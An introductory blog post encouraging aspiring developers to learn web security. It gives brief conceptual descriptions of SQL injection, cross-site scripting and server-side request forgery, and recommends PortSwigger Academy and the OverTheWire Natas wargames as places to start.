Web security is an essential part of making modern web applications. Aspiring developers should treat it as a core skill. In this blog I will explain what makes web security so important and why you should learn it as part of your IT skill set.

Why is web security important?

When you really think about it, almost all applications run on the web, think about company dashboards, account authentication, social media platforms and much more. With so many interactions going on the web, it's essential that developers take the measures to learn about security to guard their users from illegal access.

Well known web hacking techniques

SQL injection

SQLi is a popular security vulnerability that allows an attacker to send malicious queries to an application's database. This allows the attacker to gain information that can be used for illegal activities. This can include data that belongs to other users or the content of the website. Often the hacker has the ability to delete the data from the application, which interferes with the proper functioning of the application.

Cross-Site Scripting

XSS is a vulnerability where attackers inject malicious JavaScript into a website, typically through user input or manipulated URLs. XSS can be used to gain information about a certain person as the attack will have access to the user's cookies, session cookies and other sensitive information retained by the browser.

Server-Side request forgery

In a SSRF attack the attacker tricks the backend server into making HTTP requests to another destination than intended. The attack can then access internal systems that normally aren't reachable.

Why security skills make you stand out

Making a complex web application is a high value skill that provides you with multiple opportunities. But making these applications secure to make sure chances of breaches are close to 0 is another topic. By learning the most common web vulnerabilities you can guard your applications and its users against malicious intentions. For example by knowing about SQL injections you can easily sanitize your inputs to make sure no code is being executed in your codebase.

Where to get started

A great place to start is the Portswigger academy. They are the organization that created Burp Suite, which is an essential web security tool with many hacking features. Their course involves SQL injections, brute force attacks, XSS, SSRF, CSRF, XXE, Authentication and much more. The Portswigger Academy takes a lab-oriented approach so what you learn will directly be implemented.

There is also the https://overthewire.org/wargames/natas/ games which are different levels of web security challenges that you can solve. You can do these in addition to the Portswigger course.

Resources

Here are some resources related to web security that I use, I have also included the resources mentioned above: